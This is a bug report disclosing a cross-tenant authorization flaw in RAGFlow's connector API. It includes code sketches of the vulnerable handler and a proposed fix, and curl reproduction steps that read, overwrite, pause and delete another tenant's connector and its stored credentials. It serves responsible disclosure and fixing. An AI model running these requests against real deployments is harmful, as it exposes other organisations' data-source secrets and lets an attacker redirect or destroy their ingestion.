Self Checks
RAGFlow workspace code commit ID
048ec2f
RAGFlow image version
infiniflow/ragflow:v0.25.2 / nightly
Other environment information
- Component: Python REST API – data-source connectors
- Affected file: api/apps/restful_apis/connector_api.py
- Affected service: api/db/services/connector_service.py (uses CommonService.get_by_id / update_by_id / delete_by_id)
- Affected endpoints (all protected only by @login_required, with no tenant check):
- GET /v1/connectors/<connector_id>
- PATCH /v1/connectors/<connector_id>
- DELETE /v1/connectors/<connector_id>
- POST /v1/connectors/<connector_id>/resume
- GET /v1/connectors/<connector_id>/logs
- Browser: N/A (API)
- OS: N/A
Actual behavior
Any authenticated user can read, modify, pause/resume, list sync logs of, or delete any other tenant's Connector simply by guessing or learning its 32-char connector_id. The handlers fetch and mutate the row using ConnectorService.get_by_id(connector_id) / update_by_id(connector_id, ...) / delete_by_id(connector_id), which only filter by id and never compare the row's tenant_id against the caller (current_user.id / their joined tenants).
This includes the connector config JSON, which holds the credentials used to ingest from external data sources — Google Drive / Gmail OAuth refresh tokens, Box client secret + refresh token, S3 access keys, Confluence / Jira / Notion / Slack tokens, etc. So an attacker can:
- Read another tenant's data-source credentials in clear (cross-tenant secret disclosure).
- Replace another tenant's config (e.g. swap redirect_uri/credentials) and have the next sync push that tenant's data into an attacker-owned source — or simply break their ingestion.
- Delete another tenant's connector, breaking their ingestion pipelines.
- Pause or force-reschedule another tenant's connector.
- Read another tenant's sync logs, including error_msg and full_exception_trace, which routinely leak file paths, document IDs, kb_ids, and stack traces from the other tenant's environment.
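The vulnerable pattern can be illustrated with a minimal, self-contained sketch. The dict-backed store and row shapes below are stand-ins, not RAGFlow's actual classes; only the id-only lookup mirrors the reported behavior:

```python
# Stand-in connector table: one row owned by tenant A, keyed by a 32-char id.
CONNECTORS = {
    "a" * 32: {
        "tenant_id": "tenant_A",
        "name": "victim-drive",
        "config": {"refresh_token": "1//A-secret", "client_secret": "..."},
    },
}

def get_by_id(connector_id):
    """Mimics an id-only lookup: no tenant scoping at all."""
    row = CONNECTORS.get(connector_id)
    return (row is not None), row

def handle_get_connector(connector_id, current_user_tenant_id):
    """Sketch of the vulnerable handler: the caller's tenant is never consulted."""
    ok, conn = get_by_id(connector_id)
    if not ok:
        return 404, None
    # Returns the full row, config (and its secrets) included, to any
    # authenticated caller who knows the id.
    return 200, conn

# Tenant B reads tenant A's connector, including its credentials.
status, body = handle_get_connector("a" * 32, "tenant_B")
```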
Expected behavior
Each connector endpoint should verify that connector.tenant_id is owned (or team-shared) by current_user, using the same pattern already enforced by sibling endpoints (e.g. KnowledgebaseService.accessible(...) in chunk_api.py, or the tenant + team check applied in file_api_service.py after #14725). On failure it should return RetCode.AUTHENTICATION_ERROR (403) and not reveal whether the connector exists.
The "list connectors" endpoint already does the right thing (ConnectorService.list(current_user.id) filters by tenant_id) — the same scoping just needs to be applied to the per-id endpoints.
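A fix could follow the same scoping the list endpoint already applies. This is a hedged sketch, not RAGFlow's code: `accessible_tenants` and `get_scoped` are hypothetical names. The key property is that a missing id and a foreign-tenant id produce the identical 403, so existence is not revealed:

```python
AUTH_ERROR = (403, "No authorization.")  # stand-in for RetCode.AUTHENTICATION_ERROR

CONNECTORS = {
    "a" * 32: {"tenant_id": "tenant_A", "config": {"refresh_token": "1//A-secret"}},
}

def accessible_tenants(user_id):
    """Hypothetical: the caller's own tenant plus any team-shared tenants."""
    return {"tenant_B"} if user_id == "user_B" else {"tenant_A"}

def get_scoped(connector_id, user_id):
    """Fetch the row only if its tenant_id is one the caller may access."""
    row = CONNECTORS.get(connector_id)
    if row is None or row["tenant_id"] not in accessible_tenants(user_id):
        return None  # indistinguishable: missing vs. foreign tenant
    return row

def handle_get_connector(connector_id, user_id):
    row = get_scoped(connector_id, user_id)
    if row is None:
        return AUTH_ERROR
    return 200, row
```

The same `get_scoped` gate would wrap the PATCH, DELETE, resume, and logs handlers before any mutation or read.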
Steps to reproduce
1. As tenant A, create a connector (e.g. Google Drive) so it has secrets in config:
POST /v1/connectors
{
"name": "victim-drive",
"source": "google-drive",
"config": {"refresh_token": "1//A-secret", "client_id": "...", "client_secret": "..."},
"refresh_freq": 5
}
-> 200 OK; note the returned `id` = <CONN_ID>.
2. Sign out, sign in as tenant B (a completely separate account / org).
3. Read the victim's full config (including secrets):
curl -H "Authorization: Bearer <USER_B_TOKEN>" \
http://<host>/v1/connectors/<CONN_ID>
Expected: 403 / "No authorization."
Actual: 200 OK with tenant A's connector row, including `config` -> refresh_token / client_secret.
4. Overwrite the victim's config and schedule:
curl -X PATCH -H "Authorization: Bearer <USER_B_TOKEN>" \
-H "Content-Type: application/json" \
-d '{"config": {"refresh_token": "ATTACKER_TOKEN", ...}, "refresh_freq": 1}' \
http://<host>/v1/connectors/<CONN_ID>
Expected: 403.
Actual: 200 OK; tenant A's connector now points at attacker-controlled credentials.
5. Read tenant A's sync logs (error traces, kb_ids, doc names):
curl -H "Authorization: Bearer <USER_B_TOKEN>" \
"http://<host>/v1/connectors/<CONN_ID>/logs?page=1&page_size=50"
Expected: 403.
Actual: 200 OK with logs including `error_msg`, `full_exception_trace`, `kb_id`, `tenant_id`.
6. Pause/cancel the victim's sync:
curl -X POST -H "Authorization: Bearer <USER_B_TOKEN>" \
-H "Content-Type: application/json" \
-d '{"resume": false}' \
http://<host>/v1/connectors/<CONN_ID>/resume
-> 200 OK.
7. Delete the victim's connector entirely:
curl -X DELETE -H "Authorization: Bearer <USER_B_TOKEN>" \
http://<host>/v1/connectors/<CONN_ID>
-> 200 OK; row removed.
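The curl steps above can also be expressed as a dry-run request builder (connector id, host, and token are placeholders), which makes the full cross-tenant surface easy to review or to feed into a regression test without sending any traffic:

```python
def build_poc_requests(conn_id):
    """Return the cross-tenant requests from steps 3-7, in order.

    Each would be sent with tenant B's bearer token; none should succeed
    once the per-id endpoints are tenant-scoped.
    """
    base = f"/v1/connectors/{conn_id}"
    return [
        ("GET", base),                                # step 3: read config/secrets
        ("PATCH", base),                              # step 4: overwrite config
        ("GET", base + "/logs?page=1&page_size=50"),  # step 5: read sync logs
        ("POST", base + "/resume"),                   # step 6: pause the sync
        ("DELETE", base),                             # step 7: delete the row
    ]

reqs = build_poc_requests("a" * 32)
```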
Additional information
No response